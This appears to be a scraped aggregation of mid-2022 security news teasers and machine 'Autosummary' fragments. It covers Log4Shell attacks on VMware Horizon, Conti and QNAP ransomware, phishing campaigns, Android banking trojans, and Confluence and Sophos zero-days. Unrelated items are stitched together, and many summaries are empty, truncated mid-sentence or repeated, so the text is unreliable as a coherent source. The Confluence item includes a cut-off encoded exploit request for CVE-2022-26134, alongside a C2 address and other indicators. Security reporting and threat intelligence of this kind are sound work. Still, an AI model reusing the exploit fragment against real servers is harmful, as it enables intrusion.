"Autosummary:
“A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the context of the Service Appliance.” reads the advisory for this flaw published by the vendor. "VPN usage is still prevalent among 90% of security teams who have highlighted cost, time, and difficulty as reasons to not move forward with ZTNA adoption, according to a new survey conducted by Sapio Research. Furthermore, 97% say that adopting a zero trust model is a priority, with 93% of organizations having committed a budget to enhance their VPN or move toward ZTNA within the next year or two. The last two years have shifted … More
The post Despite known security issues, VPN usage continues to thrive appeared first on Help Net Security.
"Autosummary:
Key drivers for ZTNA A majority of the respondents (97%) stated that adopting a zero trust model is a priority for their organization, where 44% said they have plans to roll out zero trust but are in the early stages, while 53% said they have already begun to roll out zero trust solutions. "Autosummary:
"If your organization is running VMware Horizon and Unified Access Gateway servers and you haven’t implemented the patches or workarounds to fix/mitigate the Log4Shell vulnerability (CVE-2021-44228) in December 2021, you should threat all those systems as compromised, the Cybersecurity and Infrastructure Security Agency (CISA) has advised on Thursday. The agency accompanied the warning with detailed technical information and indicators of compromised related to two separate incident response engagements they and the United States Coast Guard … More
The post Attackers still exploit Log4Shell on VMware Horizon servers, CISA warns appeared first on Help Net Security.
"Autosummary:
According to the CISA, cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit Log4Shell in unpatched, internet-facing VMware Horizon and Unified Access Gateway servers to obtain initial access to organizations. "Autosummary:
In less than a year, the group is said to have cycled through as many as six different ransomware strains such as LockFile (August 2021), Atom Silo (October), Rook (November), Night Sky (December), Pandora (February 2022), and most recently LockBit 2.0 (April). "Autosummary:
To make matters worse for the gang, other security researchers, and some suspect Ukrainian law enforcement, began doxing Conti/TrickBot members on Twitter and conversations, addresses, social media accounts, and more. "Autosummary:
"The U.S. CISA and the Coast Guard Cyber Command (CGCYBER) warn of attacks exploiting the Log4Shell flaw in VMware Horizon servers. The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), published a joint advisory to warn of hacking attempts exploiting the Log4Shell flaw in VMware Horizon servers to […]
The post Threat actors continue to exploit Log4Shell in VMware Horizon Systems appeared first on Security Affairs.
"Autosummary:
“CISA and the United States Coast Guard Cyber Command (CGCYBER) have released a joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches.” reads the advisory. "Autosummary:
A Mitel zero-day RCE vulnerability The vulnerability lies in the Mitel Service Appliance component of MiVoice Connect, used in SA 100, SA 400, and Virtual SA, allowing an attacker to perform remote code execution (RCE) in the context of the Service Appliance. "Autosummary:
Fast Shop is an online retailer selling a wide range of products, including computers, smartphones, gaming consoles, furniture, beauty products, and home appliances. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @serghei, @jorntvdw, @struppigel, @Seifreed, @PolarToffee, @malwareforme, @VK_Intel, @BleepinComputer, @malwrhunterteam, @Ionut_Ilascu, @LawrenceAbrams, @DanielGallagher, @fwosar, @FourOctets, @billtoulas, @demonslay335, @CrowdStrike, @felipepayao, @y_advintel, @AdvIntel, @Secureworks, @GroupIB, @GossiTheDog, @juanbrodersen, @PogoWasRight, @pcrisk, @BrettCallow, and @Amigo_A_. "Here we go again: another example of government surveillance involving smartphones from Apple and Google has emerged, and it shows how sophisticated government-backed attacks can become and why there"s justification for keeping mobile platforms utterly locked down.
I don’t intend to focus too much on the news, but in brief it is as follows:
The attack works like this: The target is sent a unique link that aims to trick them into downloading and installing a malicious app. In some cases, the spooks worked with an ISP to disable data connectivity to trick targets into downloading the app to recover that connection.
Autosummary:
And while Apple, Google, and everyone else remain committed to a cat-and-mouse game to prevent such criminality, closing exploits where they can, the risk is that any government-mandated back door or device security flaw will eventually slip into the commercial markets, from which it will reach the criminal ones. Not only this, but these private surveillance companies are enabling dangerous hacking tools to proliferate, while giving these high-tech snooping facilities available to governments — some of which seem to enjoy spying on dissidents, journalists, political opponents, and human rights workers.As part of that, they must respect EU law, judicial review, criminal procedural rights and agree to no import of illegal intelligence, no political abuse of national security and to support civil society. "In this video for Help Net Security, Nick Ascoli, VP of Threat Research, PIXM, discusses a massive phishing campaign has successfully stolen an estimated five million Facebook accounts. The campaign continues to spread virally through Facebook Messenger on mobile devices as the primary target vector.
The post Inside a large-scale phishing campaign targeting millions of Facebook users appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
“Conti’s increased activity and the data leak suggest that ransomware is no longer a game between average malware developers, but an illicit RaaS industry that gives jobs to thousands of cybercriminals worldwide with various specializations” - Ivan Pisarev, Head of Dynamic Malware Analysis Team at Group-IB’s Threat Intelligence team At the top of the ransomware game Conti is currently one of the top three ransomware gangs in terms of attack frequency, falling second after LockBit this year, as per data collected from the first quarter of 2022. "Europol, the Belgian police, and the Dutch police, have apprehended members of a cybercriminal gang involved in phishing and other fraud.
The post Police seize and dismantle massive phishing operation appeared first on Malwarebytes Labs.
"Autosummary:
"A US subsidiary of Nichirin Co., a Japan-based company manufacturing and selling automotive hoses and hose parts, has been hit with ransomware, which resulted in the shut down of the subsidiary’s network and production control system. What happened? According to a press release published by Nichirin Co. on Wednesday, the affected subsidiary is Texas-based NICHIRIN-FLEX U.S.A., which experienced “unauthorized access from the outside” on June 14, 2022, and resulted in their server(s?) getting infected with … More
The post Automotive hose manufacturer hit by ransomware, shuts down production control system appeared first on Help Net Security.
"Autosummary:
According to a press release published by Nichirin Co. on Wednesday, the affected subsidiary is Texas-based NICHIRIN-FLEX U.S.A., which experienced “unauthorized access from the outside” on June 14, 2022, and resulted in their server(s?) getting infected with ransomware. "Autosummary:
"Autosummary:
C2 domain configured in the observed beacons (Secureworks) The activity and victimology of LockFile, AtomSilo, Rook, Night Sky, and Pandora are unsual compared to financially motivated ransomware operations, targeting a small number of victims over a brief period and then abandon the project altogether. "Autosummary:
MetaMask phishing site (Armorblox) The actual MetaMask domain is “metamask.io,” whereas the phishing page uses “metamask.io-integrated-status.com,” which could pass as genuine to unsuspecting users. "We take a look at reports of rogue cryptocurrency billboards out to phish wallet details from unwary victims.
The post Rogue cryptocurrency billboards go phishing for wallets appeared first on Malwarebytes Labs.
"Autosummary:
Sure enough: The screenshot is from a Discord channel, which says: BE ALERT IF YOU ARE AT NFT NYC Reports of scam billboards in NYC with QR codes leading to Wallet Drainer sites. Aşağıdaki görselin #Binance ile ilgisi yoktur❗️ Dolandırıcılık faaliyeti içinde oldukları açıkça belli olan kişiler hakkında gerekli hukuki süreçler başlatılmıştır.#SAFU pic.twitter.com/znvJDLRP7v — Binance Türkiye (@Binance_Turkish) May 8, 2022 The tactic used here was to convince unwary investors to hand over their seed/recovery phrases. If you’re up to no good, and you know digital finance is filled with insecure coin-laden wallets and expensive jpegs, this is absolutely something you’re going to take an interest in. "Autosummary:
One would imagine that the NHS is also reporting the scam websites to the NCSC so they can be shut down as quickly as possible, but – of course – opportunistic scammers will continue to create new domains, and send out more scam messages, for as long as they believe it will help them defraud innocent members of the public. "Autosummary:
As with the previous variant, the stealer’s main pupose is to steal data—including website credentials such as username, password and URL–from several popular browsers, including Google Chrome, Microsoft Edge and Firefox. In other functionality, the recently seen variant is “almost identical” to the earlier one, “with just a few minor refactors and some additional sleep commands,” they added. "Autosummary:
"Autosummary:
"The leak site essential to the operation of Conti ransomware has disappeared, but everything may not be as it appears.
The post Conti ransomware group’s pulse stops, but did it fake its own death? appeared first on Malwarebytes Labs.
"Autosummary:
However, while anything that stops Conti from terrorising businesses, schools, and hospitals is welcome, the disappearance of its leak site is unlikely to make potential ransomware victims any safer, sadly.As our May ransomware report revealed, despite the noise it generated from its attacks on Costa Rica, Conti’s activity was significantly depressed in May, while the activity of gangs with alleged links to Conti increased, driven largely by the rise of BlackBasta. "Actions to take today:
• Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions. If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat all affected VMware systems as compromised.
• Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized (DMZ) zone, ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services
The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.
Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data.
This CSA provides the suspected APT actors’ tactics, techniques, and procedures (TTPs), information on the loader malware, and indicators of compromise (IOCs). The information is derived from two related incident response engagements and malware analysis of samples discovered on the victims’ networks.
CI "
Autosummary:
The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds. This CSA provides the suspected APT actors’ tactics, techniques, and procedures (TTPs), information on the loader malware, and indicators of compromise (IOCs). Log4Shell is a remote code execution vulnerability affecting the Apache® Log4j library and a variety of products using Log4j, such as consumer and enterprise services, websites, applications, and other products, including certain versions of VMware Horizon and UAG.Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized (DMZ) zone, ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services Note: this advisory uses the MITRE ATT&CK for Enterprise framework, version 11.[T1021.001] to multiple other hosts in the production environment, including a security management server, a certificate server, a database containing sensitive law enforcement data, and a mail relay server. Note: the second threat actor group had access to the organization"s test and production environments, and on or around April 13, 2022, leveraged CVE-2022-22954 to implant the Dingo J-spy webshell. VMware made fixes available in December 2021 and confirmed exploitation in the wild on December 10, 2021.[1] Since December 2021, multiple cyber threat actor groups have exploited [T1190] Log4Shell on unpatched, public-facing VMware Horizon and UAG servers to obtain initial accessWhen executed, two randomly named *.tmp files are written to the disk at the location C:\Users\<USER>\AppData\Local\Temp\ and the embedded executable attempts to connect to hard-coded C2 server 192.95.20[.]8 over port 4443 , a non-standard port [TT571]. "Autosummary:
"Bugcrowd announced a strategic reseller partnership with SocialProof Security, furthering the company’s mission to keep customers a step ahead of evolving cyber threats. As part of the partnership, Bugcrowd will resell SocialProof Security’s services, including social engineering prevention training, protocol and practitioner workshops, and penetration testing. In addition to reselling social engineering services, Bugcrowd continues to innovate and invest in its award-winning Security Knowledge Platform with the most comprehensive suite of security solutions including bug … More
The post Bugcrowd partners with SocialProof Security to protect clients against social engineering attacks appeared first on Help Net Security.
"Autosummary:
“Even with current elevated threat levels, many organizations are surprisingly unprepared for the threats from social engineering attacks, as we repeatedly find low awareness across organizations, outdated or inconsistent identity verification, and limited practitioner skill sets,” said Ashish Gupta, CEO of Bugcrowd. "Cato Networks introduced network-based ransomware protection for the Cato SASE Cloud. Using heuristic algorithms and deep network insight, Cato detects and prevents the spread of ransomware across the enterprise without having to deploy endpoint agents. Infected machines are identified and immediately isolated for remediation. “Ransomware protection has become job one for every CISO and CIO, but too often enterprise defense strategies remain vulnerable whether by threat actors bypassing endpoint defenses or by manipulating insiders to … More
The post Cato Networks detects and interrupts ransomware with network-based ransomware protection appeared first on Help Net Security.
"Autosummary:
"According to Wikipedia, the first known non fungible token (NFT) was created in 2014 and the first NFT project was launched in late 2015. It took a few more years and more projects for the concept to trickle into the consciousness of the general public, and then a few more for the massive investments into NFTs to follow. 2020 and 2021 saw hundreds of millions of dollars being spent on NFTs. The boom was obvious … More
The post How to keep your NFTs safe from scammers appeared first on Help Net Security.
"Autosummary:
The boom was obvious but baffling to many, as buying an NFT of a piece of digital art – a song, a photo, a video, an in-game collectible item, etc. – does not mean that you get copyright, intellectual property, or other legal rights to the digital asset the NFT represents.If you’re unsure, you should visit the respective NFT projects’ social media accounts or Discord to validate these claims, but I can assure you that in 9 out of 10 cases, these are simply scams designed to pilfer your digital wallets.” "Autosummary:
"Autosummary:
"Threat actors are using the Rig Exploit Kit to spread the Dridex banking trojan instead of the Raccoon Stealer malware. Since January 2022, the Bitdefender Cyber Threat Intelligence Lab observed operators behind the RIG Exploit Kit pushing the Dridex banking trojan instead of the Raccoon Stealer. The switch occurred in February when Raccoon Stealer temporarily halted […]
The post Crooks are using RIG Exploit Kit to push Dridex instead of Raccoon stealer appeared first on Security Affairs.
"Autosummary:
The list of targeted applications includes cryptocurrency apps for major currencies (Electrum, Ethereum, Exodus, Jaxx, and Monero), popular browsers (Google Chrome, Mozilla Firefox, Microsoft Edge, Internet Explorer, Opera, Vivaldi, Waterfox, SeaMonkey, UC Browser) and email clients like Thunderbird, Outlook, and Foxmail. "US Flagstar Bank disclosed a data breach that exposed files containing the personal information of 1.5 million individuals. US-based Flagstar Bank disclosed a data breach that impacted roughly 1.5 million individuals, but the company did not share details about the attack. The security breach took place in early December 2021, and the investigation that was […]
The post Flagstar Bank discloses a data breach that impacted 1.5 Million individuals appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
The SMS Bomber GUI tool (Check Point) In the background, the loader injects shellcode into the notepad process to reach a GitHub repository, fetch an obfuscated executable, decode it, and then run it via process hollowing in "dllhost.exe." "Experts identified a spike in phishing content delivered via Azure Front Door (AFD), a cloud CDN service provided by Microsoft. Resecurity, Inc. (USA) has identified a spike in phishing content delivered via Azure Front Door (AFD), a cloud CDN service provided by Microsoft. The identified resources in one of the malicious campaigns impersonate various services […]
The post Cybercriminals Use Azure Front Door in Phishing Attacks appeared first on Security Affairs.
"Autosummary:
Cybersecurity researchers from Resecurity identified multiple domains used in the new wave of phishing attacks dating back to the beginning of June – some of which are obviously hard to differentiate from legitimate correspondence due to their naming and reference to Azure Front Door, which only adds more complexity for defenders: – gridapisignout[.]azurefd[.]net – amazon-uk[.]azurefd[.]net – webmailsign[.]azurefd[.]net – onlinesigninlogin[.]azurefd[.]net – owasapisloh[.]azurefd[.]net – docuslgn-micros0ft983-0873878383[.]azurefd.net Based on the analysis performed on services such as URLSCAN, some instances of this campaign began around the month of March 2022 and were focused primarily on Japan and hosted on Kagoya VPS resources. Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”) To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, Azure Front Door) Share this... "Autosummary:
"She wanted data, she wanted money, and she wanted to brag," Assistant U.S. Attorney Andrew Friedman told the jury in the closing arguments, according to a press statement from the Justice Department. "Autosummary:
Other victims of the latest campaign include organizations in specific U.S. verticals, including software security, the military, security solution providers, healthcare and pharmaceutical, and the manufacturing supply chain, researchers said. "Autosummary:
If anything, these threat actors have made their operations an enterprise, creating scalable, repeatable, and profitable campaigns.Hybrid work has forced organizations to introduce a bring-your-own-device (BYOD) model, which means unmanaged personal devices have access to sensitive data.Because smartphones and tablets are used for both work and personal reasons, employees can be targeted through multiple apps such as SMS, social media platforms, and third party messaging apps. "Autosummary:
It manages a wide array of security risks, including software vulnerabilities, asset exposure, missing patches, misconfigurations, deviation in security controls, and security posture anomalies from a single place.Advanced Vulnerability Management with a unified approach, integrated remediation, end-to-end automation, and a broader approach to vulnerabilities and risks will level up your vulnerability management game, enabling you to keep attacks at bay.Numerous security risks exist like a poorly configured setting, asset exposures, deviation in security controls, missing security patches, and security posture anomalies.Numerous security risks exist like a poorly configured setting, asset exposures, deviation in security controls, missing security patches, and security posture anomalies. "Autosummary:
“In some cases, the attacker may exfiltrate the unencrypted files as part of a double extortion tactic, ” said researchers Microsoft Responds When asked, Microsoft commented “the configuration functionality for versioning settings within lists is working as intended,” according to Proofpoint. Those files, stored via “auto-save” and backed-up in the cloud, typically leave end users with the impression data is shielded from a ransomware attack. "Autosummary:
"Autosummary:
"Educating employees about how to spot phishing attacks can strike a much-needed blow for network defenders
The post Phishing awareness training: Help your employees avoid the hook appeared first on WeLiveSecurity
"Autosummary:
These tactics include: Spoofed sender IDs/domains/phone numbers, sometimes using typosquatting or internationalized domain names (IDNs) Hijacked sender accounts, which are often very difficult to spot as phishing attempts Online research (via social media) to make targeted spearphishing attempts more convincing Use of official logos, headers, footers Creating a sense of urgency or excitement that rushes the user into making a decision Shortened links that hide the sender’s true destination These could lead to: Ransomware downloads Banking Trojans Data theft/breaches Cryptojacking malware Botnet deployments Account takeovers for use in follow-on attacks Business email compromise (BEC) resulting in money lost to scam invoices/payment requests The financial and reputational repercussions are immense. Entertaining lessons that use positive reinforcement rather than fear-based messages Real-world simulation exercises that can be tweaked by IT staff to reflect evolving phishing campaigns Continuous training sessions throughout the year in short bite-sized lessons of no more than 15 minutes Coverage for all employees including temps, contractors and senior executives. "Autosummary:
CredoMap infection process (CERT-UA) This vulnerability is a flaw in the Microsoft Diagnostic Tool, exploited in the wild since at least April 2022, triggering malicious downloads by simply opening a document file, or in the case of RTFs, merely viewing it in the Windows preview pane. "Seemplicity announced that René Bonvanie has joined as a member of its board. René brings decades of executive leadership experience to Seemplicity and will provide the company with operational and go-to-market guidance as it expands in North America. The appointment comes following René’s participation in Seemplicity’s recent funding rounds. René, the former Chief Marketing Officer at Palo Alto Networks for over 10 years, was a key player in the cybersecurity company’s growth to a multi-billion … More
The post Seemplicity appoints René Bonvanie to its Board of Directors appeared first on Help Net Security.
"Autosummary:
He has over 35 years of experience in product marketing, business development, management, and board positions in the high-tech industry including positions at Oracle, Salesforce, SAP, and more. "Autosummary:
"Taiwan-based QNAP Systems is warning consumers and organizations using their network-attached storage (NAS) appliances of a new DeadBolt ransomware campaign. There also appears to be a new ech0raix/QNAPCrypt campaign in progress, according to various sources, though QNAP is yet to comment on that. NAS devices are ideal targets NAS devices are mostly used by consumers and small-to-medium businesses to store, manage and share files and backups. This makes them a tempting target for criminals wielding … More
The post QNAP NAS devices hit by DeadBolt and ech0raix ransomware appeared first on Help Net Security.
"Autosummary:
Attackers generally focus on hitting QNAP and Synology NAS devices, but those by other manufacturers (Western Digital, Seagate, Zyxel, etc.) are also occasionally targeted. "Autosummary:
"The developers behind the BRATA Android malware have implemented additional features to avoid detection. The operators behind the BRATA Android malware have implemented more features to make their attacks stealthy. The malware was first spotted in 2019 by security experts at Kaspersky, the name BRAT comes from ‘Brazilian RAT Android,’ because at the time it was used to […]
The post BRATA Android Malware evolves and targets the UK, Spain, and Italy appeared first on Security Affairs.
"Autosummary:
Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”) To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, BRATA "The FBI has issued a warning about cryptocurrency scams on LinkedIn. We see what the scammers are up to and how you can avoid them.
The post LinkedIn scams are a “significant threat”, warns FBI appeared first on Malwarebytes Labs.
"Autosummary:
In fact, according to according to Sean Ragan, the FBI’s special agent in charge of the San Francisco and Sacramento, California, field offices, cryptocurrency scams are big business on LinkedIn.This may include sending cash directly, cryptocurrency, gift cards, prizes, and other winnings.This may include sending cash directly, cryptocurrency, gift cards, prizes, and other winnings. "Autosummary:
The claim ended up on court a short while later, but it took over three years for the court to come to a decision – ruling in Merck"s favor on this occasion, stating that Ace American, like many other insurers, has not sufficiently changed the wording in its policy exclusions to ensure that the insured – Merck – fully understood that a cyberattack launched in the context of an act of war would mean that the policy coverage is not valid. However, when the company tried to claim on its USD 1.75bn "all-risk" insurance policy, Ace American initially refused to pay the claim, arguing that it was subject to an "Acts of War" exclusion clause. When an organization suffers from a ransomware attack, how does the insurer – or the claimant – prove that a specific organization was behind an attack, and by consequence, what the motivation for the attack was – e.g. war? In this article, we"ll outline why, particularly given the current climate, war exclusion clauses are increasingly rendering ransomware insurance of reduced value – and why your organization should focus on protecting itself instead. "Google Project Zero experts disclosed details of a 5-Year-Old Apple Safari flaw actively exploited in the wild. Researchers from the Google Project Zero team have disclosed details of a vulnerability in Apple Safari that was actively exploited in the wild. The vulnerability, tracked as CVE-2022-22620, was fixed for the first time in 2013, but in […]
The post Google expert detailed a 5-Year-Old flaw in Apple Safari exploited in the wild appeared first on Security Affairs.
"Autosummary:
Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”) To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, Apple Safari) Apple has addressed a zero-day vulnerability, tracked as CVE-2022-22620 (CVSS score: 8.8), in the WebKit affecting iOS, iPadOS, macOS, and Safari that may have been actively exploited in the wild. "Autosummary:
Samples of stolen data, including names, SSNs, addresses, tax records, and phone numbers, were eventually published on Clop’s data leak site. "Autosummary:
"Experts warn of a new ech0raix ransomware campaign targeting QNAP Network Attached Storage (NAS) devices. Bleeping Computer and MalwareHunterTeam researchers, citing user reports and sample submissions on the ID Ransomware platform, warn of a new wave of ech0raix ransomware attacks targeting QNAP Network Attached Storage (NAS) devices. The ransomware, tracked by Intezer as “QNAPCrypt” and “eCh0raix” by Anomali, is […]
The post Experts warn of a new eCh0raix ransomware campaign targeting QNAP NAS appeared first on Security Affairs.
"Autosummary:
Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”) To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, QNAP) "Autosummary:
The BRATA evolution BRATA started as a banking trojan in Brazil in 2019, able to perform screen capturing, install new apps, and turn off the screen to make the device appear powered down. "A critical vulnerability in Ninja Forms plugin potentially impacted more than one million WordPress websites In middle June, the Wordfence Threat Intelligence team noticed a back-ported security update in the popular WordPress plugin Ninja Forms, which has over one million active installations. The analysis of the updates revealed that they patched a code injection vulnerability […]
The post Critical flaw in Ninja Forms WordPress Plugin actively exploited in the wild appeared first on Security Affairs.
"Autosummary:
Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”) To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, WordPress) "Autosummary:
"Malibot is a new Android malware targeting online banking and cryptocurrency wallet customers in Spain and Italy. F5 Labs researchers spotted a new strain of Android malware, named Malibot, that is targeting online banking and cryptocurrency wallet customers in Spain and Italy. The experts documented attacks against multiple banks, including UniCredit, Santander, CaixaBank, and CartaBCC. […]
The post MaliBot Android Banking Trojan targets Spain and Italy appeared first on Security Affairs.
"Autosummary:
Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”) To nominate, please visit: https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, Malibot) Share this... "Autosummary:
"Autosummary:
In the background, two Matanbuchus DLL payloads ("main.dll") are dropped in two different locations, a scheduled task is created to maintain persistence across system reboots, and communication with the command and control (C2) server is established. "According to Volexity, a webshell was discovered in Atlassian Confluence server during an incident response investigation. Volexity determined that it was a zero-day vulnerability that could execute remote code even after the latest patch was completed and reported the issue to Atlassian. After receiving the issue report and identifying it as a zero-day, Atlassian issued a security advisory for the critical unauthenticated remote code execution. Timeline (based on PDT) May 31: Volexity found zero-day vulnerability … More
The post Criminal IP analysis report on zero-day vulnerability in Atlassian Confluence appeared first on Help Net Security.
"Autosummary:
156.146.56.136 VPN 198.147.22.148 VPN 59.163.248.170 VPN 64.64.228.239 VPN 66.115.182.102 VPN 66.115.182.111 VPN 156.146.34.9 Tor One of the 15 Confluence zero-day exploit cases released by Volexity is detected as a VPN on Criminal IP.Servlet ActionContext%40getResponse%28%29.setHeader%28%22X- Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response Conclusion On June 3rd, 2022, Atlassian released a patch for CVE-2022-26134. Webshell that was also used for MS Exchange Server attacks According to Volexity, attackers could exploit CVE-2022-26134 to upload a webshell, particularly the China Chopper, a notorious security vulnerability issue that was also used during the last Microsoft Exchange Server crisis. "Fraud is a persistent threat, and there’s no end in sight as the e-commerce landscape continues to evolve and the use of online payment platforms increases. According to one recent study, e-commerce merchants, consumers and financial service providers lose approximately $6.4 billion to fraud annually. Even worse: Losses from false declines are estimated at $443 billion—almost 70 times greater than losses from fraud—each year. Customers expect their accounts and transactions to be secure, but an … More
The post How financial institutions are improving customer experience with fraud prevention measures appeared first on Help Net Security.
"Autosummary:
By leveraging a wide range of digital identity markers in the background—such as location, IP address, device-specific data—and assessing the connections between customers’ online and offline identities and their typical behaviors, organizations can gain confidence in their authentication processes without introducing overt, disruptive speed bumps for customers. Leveraging data insights in practice Various institutions are already using a host of online, offline, and device-based elements to corroborate an existing customer’s digital information or a prospective customer’s application, and they are reaping clear benefits. "Proofpoint unveiled its annual Human Factor report, which provides a comprehensive examination of the three main facets of user risk — vulnerability, attacks, and privilege — and how threat actors continue their ceaseless creativity as they exploit the many opportunities presented by people. The report dives deep into user risk, drawing on data and insight from a year’s worth of research, covering threats detected, mitigated, and resolved across one of the largest datasets in cybersecurity. … More
The post Cyber criminals continue to target and exploit people appeared first on Help Net Security.
"Autosummary:
The report dives deep into user risk, drawing on data and insight from a year’s worth of research, covering threats detected, mitigated, and resolved across one of the largest datasets in cybersecurity. "If it seems like you’re receiving more spam than normal, you probably are. Seventy-four percent of consumers say they have received a scam text so far this year, while as many as 83% have received a scam phone call, according to Allstate Identity Protection’s (AIP) first quarter Identity Fraud in Focus report. Of those, nearly half report receiving 11 or more spam attempts via text or call every week. Although even successful scams sometimes fail … More
The post Fraud trends and scam tactics consumers should be aware of appeared first on Help Net Security.
"Autosummary:
Seventy-four percent of consumers say they have received a scam text so far this year, while as many as 83% have received a scam phone call, according to Allstate Identity Protection’s (AIP) first quarter Identity Fraud in Focus report. "Autosummary:
DeadBolt ransomware As seen during previous attacks targeting QNAP NAS devices in late January and hitting thousands of victims, DeadBolt ransomware hijacks the device"s login page to display a screen stating, "WARNING: "Autosummary:
" The truth is, however, that the scam is using the lure to trick users into entering their names, email addresses, and phone numbers into a website - with the intention, no doubt, of being later exploited by fraudsters. "Autosummary:
Now according to Volexity, early evidence of exploitation of the flaw commenced on March 5, 2022, when it detected anomalous network activity originating from an unnamed customer"s Sophos Firewall running the then up-to-date version, nearly three weeks before public disclosure of the vulnerability. "Autosummary:
"Autosummary:
"Autosummary:
"If your organization gets hit by a ransomware gang that has also managed to steal company data before hitting the “encrypt” button, which types of data are more likely to end up being disclosed as you debate internally on whether you should pay the ransomware gang off? Rapid7 analysts analyzed 161 data disclosures performed by ransomware gangs using the double extortion approach between April 2020 and February 2022, and found that: The most commonly leaked … More
The post Which stolen data are ransomware gangs most likely to disclose? appeared first on Help Net Security.
"Autosummary:
Files containing intellectual property (e.g., trade secrets, research data, etc.) are rarely disclosed (12%) by ransomware gangs, but if the organization is part of the pharmaceutical industry, the risk of IP data being disclosed is considerably higher (43%), “likely due to the high value placed on research and development within this industry.” "Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @serghei, @jorntvdw, @malwareforme, @VK_Intel, @struppigel, @DanielGallagher, @PolarToffee, @LawrenceAbrams, @Ionut_Ilascu, @fwosar, @billtoulas, @BleepinComputer, @Seifreed, @malwrhunterteam, @FourOctets, @demonslay335, @pcrisk, @proofpoint, @PogoWasRight, @BrettCallow, @Unit42_Intel, and @Amigo_A_. "China-linked threat actors exploited the zero-day flaw CVE-2022-1040 in Sophos Firewall weeks before it was fixed by the security vendor. Volexity researchers discovered that the zero-day vulnerability, tracked as CVE-2022-1040, in Sophos Firewall was exploited by Chinese threat actors to compromise a company and cloud-hosted web servers it was operating. The vulnerability was exploited by […]
The post Chinese DriftingCloud APT exploited Sophos Firewall Zero-Day before it was fixed appeared first on Security Affairs.
"Autosummary:
